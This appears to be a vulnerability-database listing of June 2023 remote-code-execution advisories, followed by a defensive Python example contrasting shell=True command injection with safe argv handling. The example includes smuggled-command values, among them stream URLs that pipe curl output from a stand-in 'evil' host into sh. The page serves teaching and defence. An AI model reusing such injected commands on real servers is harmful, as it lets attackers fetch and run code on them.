11233 matches found

Github Security Blog
added 2023/06/14 3:30 p.m. (52 views)

Langchain OS Command Injection vulnerability

Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the JiraAPIWrapper component (the JIRA API wrapper). This vulnerability allows attackers to execute arbitrary code via crafted input. As noted in the "releases/tag" reference, a fix is available...

CVSS 9.8 | AI score 10 | EPSS 0.01681
Exploits: 1 | References: 8 | Affected software: 1

CVE
added 2023/06/14 2:52 p.m. (219 views)

CVE-2023-29337

CVE-2023-29337 is a Linux-specific vulnerability in NuGet Client (and related .NET tooling) describing a race condition that can enable a symlink attack and remote code execution when a victim opens specially crafted content. IBM/IBM RPA advisory confirms remote code execution possibilities via ....

CVSS 7.1 | AI score 7.5 | EPSS 0.01148
Exploits: 0 | References: 1 | Affected software: 1

Cvelist
added 2023/06/14 2:52 p.m. (27 views)

CVE-2023-28310 Microsoft Exchange Server Remote Code Execution Vulnerability

...

CVSS 8 | AI score 8.5 | EPSS 0.25002
Exploits: 0 | References: 1

GithubExploit
added 2023/06/14 6:50 a.m. (633 views)

Exploit for Command Injection in Vmware Aria_Operations_For_Networks

CVE-2023-20887 Exploit VMWare vRealize Network Insight Pre-Aut...

CVSS 9.8 | AI score 9.9 | EPSS 0.98243
Exploits: 7

Malwarebytes
added 2023/06/14 5:00 a.m. (73 views)

Microsoft fixes six critical vulnerabilities in June Patch Tuesday

It's that time of the month again: we're looking at June's Patch Tuesday roundup. Microsoft has released its monthly update, and compared to previous months, it's actually not so bad. No actively exploited zero-days and only six critical vulnerabilities. So, we'll have the luxury of going over those...

CVSS 7.5 | AI score 9 | EPSS 0.99618
Exploits: 10

NVD
added 2023/06/14 12:15 a.m. (18 views)

CVE-2023-32017

Microsoft PostScript Printer Driver Remote Code Execution Vulnerability...

CVSS 7.8 | AI score 8.8 | EPSS 0.00497
Exploits: 0 | References: 1

Cvelist
added 2023/06/14 12:00 a.m. (24 views)

CVE-2023-34540

Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the JiraAPIWrapper component (the JIRA API wrapper). This vulnerability allows attackers to execute arbitrary code via crafted input. As noted in the "releases/tag" reference, a fix is available...

AI score 10 | EPSS 0.01681
Exploits: 1 | References: 3

CVE
added 2023/06/14 12:00 a.m. (54 views)

CVE-2023-25367

CVE-2023-25367 affects Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS. The issue is unfiltered user input allowing Remote Code Execution via the SCPI interface or web server. Root cause: insufficient input validation and, in some sources, lack of authentication on the SCPI interface, enabling remot...

CVSS 9.8 | AI score 9.6 | EPSS 0.0172
Exploits: 1 | References: 2 | Affected software: 1

OpenVAS
added 2023/06/14 12:00 a.m. (32 views)

Microsoft Outlook 2013 Service Pack 1 RCE Vulnerability (KB5002382)

This host is missing an important security update according to Microsoft KB5002382. (SPDX-FileCopyrightText: 2023 Greenbone AG. Some text descriptions might be excerpted from referenced sources and are Copyright (C) the respective right holders. SPDX-License-Identifier: GPL-2.0-only.) if(descriptio...

CVSS 8.8 | AI score 8.7 | EPSS 0.05718
Exploits: 3 | References: 1

Tenable Nessus
added 2023/06/14 12:00 a.m. (32 views)

Remote Desktop Client for Windows RCE (June 2023)

The Windows Remote Desktop client for Windows installed on the remote host is missing security updates. It is, therefore, affected by a remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. Note that Nessus has not...

CVSS 8.8 | AI score 9.3 | EPSS 0.01346
Exploits: 0 | References: 3

OSV
added 2023/06/13 6:30 p.m. (24 views)

GHSA-3X74-V64J-QC3F Withdrawn Advisory: CraftCMS Server-Side Template Injection vulnerability

Withdrawn. This advisory has been withdrawn because the CVE has been disputed and the underlying vulnerability is likely invalid. This link is maintained to preserve external references. According to maintainers of Craft CMS, only administrators can access Settings, and those administrators may ha...

CVSS 7.2 | AI score 7.2 | EPSS 0.02203
Exploits: 1 | References: 7

GithubExploit
added 2023/06/13 1:17 p.m. (636 views)

Exploit for Command Injection in Vmware Aria_Operations_For_Networks

CVE-2023-20887 POC for CVE-2023-20887 VMWare Aria Operations f...

CVSS 9.8 | AI score 10 | EPSS 0.98243
Exploits: 7

Cvelist
added 2023/06/13 12:00 a.m. (18 views)

CVE-2023-30179

CraftCMS version 3.7.59 is vulnerable to Server-Side Template Injection (SSTI). An authenticated attacker can inject a Twig template into the User Photo Location field when setting it in User Settings, leading to remote code execution. NOTE: the vendor disputes this because only Administrator...

AI score 7.4 | EPSS 0.02203
Exploits: 1 | References: 4

CVE
added 2023/06/13 12:00 a.m. (61 views)

CVE-2023-30179

CraftCMS is affected by a Server-Side Template Injection (SSTI) in version 3.7.59, where an authenticated user can inject Twig templates into the User Photo Location in User Settings, potentially enabling Remote Code Execution. The root cause cited is lack of input validation for the Twig code in...

CVSS 7.2 | AI score 7.2 | EPSS 0.02203
Exploits: 1 | References: 4 | Affected software: 1

Tenable Nessus
added 2023/06/13 12:00 a.m. (13 views)

EulerOS Virtualization 3.0.6.0 : sysstat (EulerOS-SA-2023-2232)

According to the versions of the sysstat package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities: - sysstat is a set of system performance tools for the Linux operating system. On 32 bit systems, in versions 9.1.16 and newer but...

CVSS 7.8 | AI score 7.4 | EPSS 0.01096
Exploits: 1 | References: 2

Packet Storm
added 2023/06/13 12:00 a.m. (479 views)

TerraMaster TOS 4.2.29 Remote Code Execution

This module requires Metasploit: https://metasploit.com/download. Current source: https://github.com/rapid7/metasploit-framework. (Ruby module excerpt: require 'digest/md5'; require 'time'; class MetasploitModule ... 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989', ...)

CVSS 9.8 | AI score 7.1 | EPSS 0.8405
Exploits: 10

Huntr
added 2023/06/12 8:34 p.m. (32 views)

Desktop APP RCE via saveDraft IPC

🔒️ Requirements: The user must load a malicious project. 📝 Description: In version 20.3.3 (commit 5383c20e947fd772668316e407edc5d5db4850db), the shell=true option is added to a spawn execution. This is really dangerous, as it allows a malicious user to execute commands even from attributes. Example: j...

CVSS 7.5 | AI score 7.1 | EPSS 0.01069
Exploits: 0

Rapid7 Blog
added 2023/06/12 6:16 p.m. (91 views)

CVE-2023-27997: Critical Fortinet Fortigate Remote Code Execution Vulnerability

On June 9, 2023, Fortinet silently patched a purported critical remote code execution (RCE) vulnerability in Fortigate SSL VPN firewalls. According to Lexfo Security's Charles Fol, who discovered the vulnerability, the flaw is heap-based and reachable pre-authentication. According to reports,...

CVSS 7.5 | AI score 10.1 | EPSS 0.85689
Exploits: 10

Cvelist
added 2023/06/12 4:30 p.m. (33 views)

CVE-2023-34105 SRS has command injection vulnerability in demonstration api-server for HTTP callback.

SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's api-server server is vulnerable to a drive-by command injection. An attacker may send a request to the /api/v1/snapshots endpoint containing an...

CVSS 7.5 | AI score 8.4 | EPSS 0.0876
Exploits: 1 | References: 3

CVE
added 2023/06/12 4:30 p.m. (91 views)

CVE-2023-34105

SRS (Simple Real-time Server) api-server is vulnerable to drive-by command injection on POST /api/v1/snapshots in versions prior to 5.0.157, 5.0-b1, and 6.0.48, potentially leading to Remote Code Execution (RCE). Connected advisories confirm a fix in 5.0.157, 5.0-b1, and 6.0.48. Mitigate by updat...

CVSS 7.5 | AI score 8.2 | EPSS 0.0876
In the wild | Exploits: 1 | References: 3 | Affected software: 1

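The Huntr entry (shell=true added to a spawn call) and the two SRS entries (command injection through the body of POST /api/v1/snapshots) describe the same defect in two code bases: text the attacker controls is concatenated into a string that a shell parses. The Python below is an added example and is not code from the Huntr report, from the SRS project or from the desktop app in the report; the echo-based spawn, the ffmpeg snapshot command line and the rtmp-only URL check are assumptions standing in for the real code. It shows the metacharacters taking effect under shell=True, the same input staying a single argument when passed as argv, and a snapshot command built as argv so that a URL carrying `;` or `|` can never reach a shell.

```python
"""Command injection via a shell string, and the argv form that avoids it.

Added example, not code from the Huntr report, the SRS project or the
desktop app described above. The echo-based spawn, the ffmpeg command line
and the rtmp-only URL check are assumptions standing in for the real code.
"""
from __future__ import annotations

import subprocess
from urllib.parse import urlparse

# Constructed attacker input: what a "malicious project" attribute or the
# stream field of a POST /api/v1/snapshots body might carry.
MALICIOUS_ATTR = "hello; echo INJECTED"


def run_unsafe(attr: str) -> str:
    """shell=True: the string goes to /bin/sh -c, so ';' starts a second command."""
    proc = subprocess.run(f"echo {attr}", shell=True, capture_output=True, text=True)
    return proc.stdout  # "hello\nINJECTED\n"


def run_safe(attr: str) -> str:
    """No shell: attr is one argv element, so metacharacters are inert text."""
    proc = subprocess.run(["echo", attr], capture_output=True, text=True)
    return proc.stdout  # "hello; echo INJECTED\n"


def is_valid_stream_url(stream_url: str) -> bool:
    """Allow-list check for a snapshot source: an rtmp(s) URL with a host.

    This does not try to strip shell metacharacters (that is argv's job); it
    rejects anything that is not a stream URL at all, including option-looking
    strings such as "-loglevel" that ffmpeg would otherwise parse as a flag.
    """
    try:
        parsed = urlparse(stream_url)
        return parsed.scheme in ("rtmp", "rtmps") and bool(parsed.hostname)
    except ValueError:  # e.g. a malformed IPv6 netloc
        return False


def snapshot_argv(stream_url: str, out_path: str) -> list[str]:
    """Build the ffmpeg argv for a snapshot; it is never joined into a shell string.

    The URL may still contain ';' or '|': as a single argv element it is handed
    to ffmpeg verbatim, which at worst fails to connect.
    """
    if not is_valid_stream_url(stream_url):
        raise ValueError(f"rejected stream url: {stream_url!r}")
    return ["ffmpeg", "-i", stream_url, "-vframes", "1", "-y", out_path]


def snapshot_command_unsafe(stream_url: str, out_path: str) -> str:
    """The vulnerable shape: one string destined for bash -c or shell=True.

    A URL such as "rtmp://h/live/s; curl http://evil/x | sh" terminates the
    ffmpeg command at the ';' and runs the rest, exactly as run_unsafe shows.
    """
    return f"ffmpeg -i {stream_url} -vframes 1 -y {out_path}"


if __name__ == "__main__":
    print(repr(run_unsafe(MALICIOUS_ATTR)))
    print(repr(run_safe(MALICIOUS_ATTR)))
    url = "rtmp://media.example/live/cam1; curl http://evil.example/x | sh"
    print(snapshot_command_unsafe(url, "/tmp/cam1.png"))
    print(snapshot_argv(url, "/tmp/cam1.png"))
```

The fix for both reports is the second shape, not a blocklist of metacharacters: once the command is an argv list and no shell is involved, the attacker's text cannot change which program runs, and the remaining job of the validator is only to keep the input from being read as an option by the program that is run.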